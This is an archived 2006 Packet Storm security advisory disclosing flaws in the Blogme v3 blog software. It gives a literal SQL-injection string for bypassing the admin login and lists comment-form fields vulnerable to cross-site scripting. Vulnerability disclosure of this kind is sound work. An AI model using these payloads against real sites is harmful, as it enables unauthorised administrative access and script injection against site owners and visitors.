blogmev3.txt

2006-11-16T00:00:00
ID PACKETSTORM:52163
Type packetstorm
Reporter benjamin moss
Modified 2006-11-16T00:00:00

Description

                                        
                                            `vendor site:http://www.drumster.net/  
product:Blogme v3  
bug:login bypass & xss (post)  
risk:high  
  
  
admin login bypass :  
user : ' or '1' = '1  
passwd: 1'='1' ro '  
  
xss post :  
in: /comments.asp?blog=85   
vulnerables fields:  
- Name   
- URL  
- Comments  
  
  
laurent gaffié & benjamin mossé  
http://s-a-p.ca/  
contact: saps.audit@gmail.com  
`